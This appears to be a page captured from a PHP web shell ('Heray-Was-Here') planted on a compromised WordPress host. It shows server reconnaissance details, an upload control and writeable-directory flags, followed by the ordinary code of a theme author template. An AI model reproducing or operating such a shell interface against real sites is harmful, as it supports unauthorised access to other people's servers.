Heray-Was-Here
Server : Apache
System : Linux binac.nextwavehosting.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
User : homes21 ( 1062)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/homes21/public_html/wp-content/themes/rh2l/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/homes21/public_html/wp-content/themes/rh2l/author-7.php
<?php
/** no direct access **/
defined('_WPLTEXEC') or die('Restricted access');

/** get theme helper **/
global $wpl_helper;
$wpl_helper = isset($wpl_helper) ? $wpl_helper : new wpl_helper();

$wpl_helper->get_head(); ?>
<section id="main_box_container">
	<section id="main_box" class="clearfix container page_container">
		<div id="content" class="clearfix">
			<?php echo do_shortcode('[wpl_profile_show sf_select_user_id="7" wplpagination="scroll"]'); ?>
            <div class="content_container clearfix">
                <div id="content_l" class="col-md-8">
			<?php if ( have_posts() ) : ?>

			<header class="archive-header">
				<h1 class="archive-title">
					<?php
						/*
						 * Queue the first post, that way we know what author
						 * we're dealing with (if that is the case).
						 *
						 * We reset this later so we can run the loop properly
						 * with a call to rewind_posts().
						 */
						the_post();

						printf( __( 'All posts by %s', WPLT_TEXTDOMAIN ), get_the_author() );
					?>
				</h1>
				<?php if ( get_the_author_meta( 'description' ) ) : ?>
				<div class="author-description"><?php the_author_meta( 'description' ); ?></div>
				<?php endif; ?>
			</header><!-- .archive-header -->

			<?php
					/*
					 * Since we called the_post() above, we need to rewind
					 * the loop back to the beginning that way we can run
					 * the loop properly, in full.
					 */
					rewind_posts();

					// Start the Loop.
					while ( have_posts() ) : the_post();

						/*
						 * Include the post format-specific template for the content. If you want to
						 * use this in a child theme, then include a file called called content-___.php
						 * (where ___ is the post format) and that will be used instead.
						 */
						get_template_part( 'content', get_post_format() );

					endwhile;
					// Previous/next page navigation.
					$wpl_helper->wpl_paging_nav();

				else :
					// If no content, include the "No posts found" template.
					get_template_part( 'content', 'none' );

				endif;
			?>
                </div>
                <aside id="right_col" class="col-md-4">
                    <?php $wpl_helper->get_sidebar('sidebar-2'); ?>
                </aside>
            </div>
            <div id="main_widget_area" class="main_widget_area widget">
                <?php $wpl_helper->get_sidebar('sidebar-1'); ?>
            </div>
			
            </div>
		</div><!-- #content -->
	</section><!-- #primary -->
</section>
<?php
$wpl_helper->get_footer();

Hry